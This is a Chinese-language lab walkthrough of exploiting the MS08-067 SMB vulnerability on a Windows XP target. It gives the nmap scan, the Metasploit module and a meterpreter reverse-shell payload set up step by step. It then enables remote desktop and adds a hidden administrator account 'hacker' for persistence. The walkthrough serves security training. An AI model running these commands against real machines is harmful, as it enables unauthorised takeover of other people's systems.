漏洞概要
MS-08-067是Windows平台中smb服務445端口的遠程代碼執行漏洞
利用成功可以遠程控制主機
影響范圍為:windows2000、xp、server 2003、server 2008、甚至早些版本的Win7
實驗場景
攻擊機:kali2022msfconsole利用
靶機:windows xp
漏洞利用
使用ifconfig和ipconfig獲取攻擊機和靶機的IP地址
攻擊機IP:172.16.1.117

靶機IP:172.16.1.116

nmap的默認腳本在/usr/share/nmap/scripts,ls -l| grep 08-67篩選漏洞相關模塊

使用nmap的漏洞掃描腳本smb-vuln-ms08-067掃描靶機是否存在ms-08-067漏洞
nmap -script smb-vuln-ms08-067 -p 445 172.16.1.116 -n

發現存在漏洞,使用msfconsole進行利用
msfconsole啟動漏洞平台

查找漏洞利用腳本
search ms08_067

使用漏洞利用模塊,並使用show options查看漏洞利用模塊配置參數
use exploit/windows/smb/ms08_067_netapi
show options
Required為yes是必須要設置的參數

在最新版kali中,對常見的漏洞自動選擇了合適的payload,例如這里的windows/meterpreter/reverse_tcp,並且配置自動配置了反彈會話的IP地址和端口
就是我們本機的IP和端口

如果不是這個payload需要我們手動設置
set payload windows/meterpreter/reverse_tcp
set LHOST 172.16.1.117
set LPORT 4444

觀察我們必須設置目標的IP地址,就是RHOSTS,這里如果是RHOST是只可以設置一個IP地址,如果是RHOSTS則可以設置一個網段,對一個網段進行攻擊

設置目標IP
set RHOSTS 172.16.1.116

這里端口默認就是445端口,不在改變
這里有一個target可以設置,target是用來指定靶機操作系統類型的,指定的准確的話,跟容易利用成功
show targets可以查看可以設置的target

這里有很多taret,我么使用target代號為34的
set target 34

設置完成后,可以使用check命令查看靶機是否存在這個漏洞,check只有在一些常見的漏洞中可以使用

存在漏洞,使用命令exploit或者run進行漏洞利用

利用成功,成功獲取靶機會話,並且權限為SYTEM最高權限
后面我們可以開啟靶機的3389端口,進行遠程桌面連接
使用run getgui -e開啟靶機3389端口

netstat查看靶機3389端口是否開放

創建hacker用戶,並加入到Aministrators默認管理員組
net user hacker 123456 /add
net localgroup Aministrators hacker /add
最后可以使用net user hacker查看是否已經加入到管理員組

打開一個新的終端,連接靶機遠程桌面
rdesktop -u hacker -p 123456 172.16.1.116

成功獲取靶機權限
